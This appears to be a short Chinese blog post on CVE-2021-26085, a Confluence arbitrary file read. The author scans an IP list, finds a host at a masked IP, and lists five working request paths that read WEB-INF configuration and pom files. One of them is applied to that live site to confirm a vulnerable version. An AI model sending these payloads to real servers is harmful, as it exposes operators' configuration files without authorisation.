CVE-2021-26085 confluence 配置文件泄露漏洞

用vscan扫描IP清单,发现一个confluence小漏洞。

https://github.com/veo/vscan

http://***.***.***.***:9090 [200] [主页面 - PBconfluence] [Atlassian Confluence,Confluence,Java,fisheye] [2737] [FileFuzz: "GoPOC_confluence|CVE_2021_26085","poc-yaml-confluence-cve-2021-26085-arbitrary-file-read","NucleiPOC_CVE-2021-26085"]

这里有5条POC测试路径。

/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/decorators.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml

用这个测试一下看看,路径直接跟到网站http://***.***.***.***:9090后面。

/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml

测试的这个网站基于Atlassian Confluence 6.13.23 技术构建,版本小于7.4.10,所以存在漏洞。

漏洞基本情况如下:

https://avd.aliyun.com/detail?id=AVD-2021-26085

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值